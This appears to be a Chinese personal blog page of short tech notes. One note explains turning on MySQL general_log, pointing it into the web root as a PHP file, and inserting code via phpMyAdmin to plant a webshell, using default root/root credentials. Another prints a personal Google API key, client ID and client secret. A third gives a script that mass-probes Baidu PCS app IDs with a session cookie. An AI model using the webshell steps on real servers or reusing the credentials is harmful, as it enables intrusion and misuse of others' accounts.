admin 发布的文章

其实不是什么新技术,记录下来.
PHPStudy环境.内网.root/root默认密码.
想当然的.就先用select XX into outfile XXXX
但是由于phpstudy开启了secure-file-priv导致无法outfile.

群里问了下,可以通过日志general_log的方式.默认是是OFF的
SHOW VARIABLES LIKE 'general%'
使用这个命令查询,然后执行下面的命令:

set global general_log = "ON";
set global general_log_file='D:\phpStudy\phpMyAdmin\xxx.php';

这样日志就写到web目录了.

后面,查询一下.结果,卡住了.不知道为什么.
select version()都可以执行,都可以写入php的log文件.
后来尝试phpmyadmin新建一个字段,直接插入一句话shell,这里执行的应该是insert语句.

CREATE TABLE IF NOT EXISTS `webshell` ( `shell` varchar(100) NOT NULL) ENGINE=MyISAM DEFAULT CHARSET=utf8;
INSERT INTO `webshell` (`shell`) VALUES ('<?php echo "test by kele";phpinfo();?>');

这样日志里面就有webshell了.

英文输入状态下,自动输入推荐的单词.
比如我打的是"shanma",下方的联想词里面会出现3个候选词,中间一个将被选中.
接下来只要我打一个标点符号,就自动确认中间这个候选词.但是这个单词并不是我想要的.

比如我想输入test.shenma.com,会变成test.Sherman.com
找遍了整个设置,也没找出来怎么关闭.
但是,其实百度输入法是没有这个问题的.

最终解决办法就是,换个皮肤就OK了.
搜索"华为怀旧皮肤1.0",下载使用.
在英文状态下,中英文切换键,右侧有个ABC带下划线的那种.
点击,使它下面没有下划线.就关闭了联想功能.

最坑的是就,
1),这狗B功能是默认开启的.
2),本地的几个皮肤都没有这个键,导致无法关闭此功能.但是网上下载的皮肤都有!

用上了chromium.但是因为没有API KEY,导致无法登录浏览器,无法同步书签栏.

参考这个文章,https://gist.github.com/cvan/44a6d60457b20133191bd7b104f9dcc4
申请属于自己的API KEY.
关键点就是上面URL里面提到的7和10.
申请好之后

管理员的命令行CMD下输入.
setx GOOGLE_API_KEY AIzaSyBwIKtzAADbKEXxKFki4-5335pRp6Dggq0
setx GOOGLE_DEFAULT_CLIENT_ID 461596714253-5hv1lml8olmag1n02boogjp1krnp95k4.apps.googleusercontent.com
setx GOOGLE_DEFAULT_CLIENT_SECRET qzx3tM5Z3Ole3UiBZfe7GVSw
上面这几个是我自己申请的

出错提示“获取目录下的文件列表: 遇到错误, 远端服务器返回错误, 代码: 4, 消息: No permission to do this operation ”。
解决办法:更改APPID。
打开C:/Users/Administrator/AppData/Roaming/BaiduPCS-Go/pcs_config.json

获取可用APPID的脚本

from __future__ import print_function

import requests
import threading

import sys


def eprint(*args, **kwargs):
    print(*args, file=sys.stderr, **kwargs)


class GetterTread(threading.Thread):
    def __init__(self, thread_id, app_id, times=1000):
        threading.Thread.__init__(self)

        self.__thread_id = thread_id

        self.__URL = "http://pcs.baidu.com/rest/2.0/pcs/file?app_id={}&method=list&path=%2F"

        with open("./BDUSS.txt") as f:
            BDUSS = f.readline()
            self.__COOKIES = {"BDUSS": BDUSS}

        self.app_id = app_id
        self.times = times

    def run(self):
        current_id = self.app_id
        while current_id - self.app_id < self.times:  # 250000:
            url = self.__URL.format(current_id)

            try:
                r = requests.get(url, cookies=self.__COOKIES)
                if r.status_code == 200:
                    print(current_id)
            except Exception:
                eprint("Exception: " + str(current_id))
                break
            current_id += 1
            # print("id " + str(self.__thread_id) + " over")


if __name__ == '__main__':

    start_app_id = 300000
    times = 1000

    threads_list = []

    while start_app_id < 500000:
        thread = GetterTread(start_app_id, start_app_id, times)
        thread.start()
        threads_list.append(thread)
        start_app_id += times

    # print("size: " + str(len(threads_list)))

    for thread in threads_list:
        thread.join()

附件
baidupcs.7z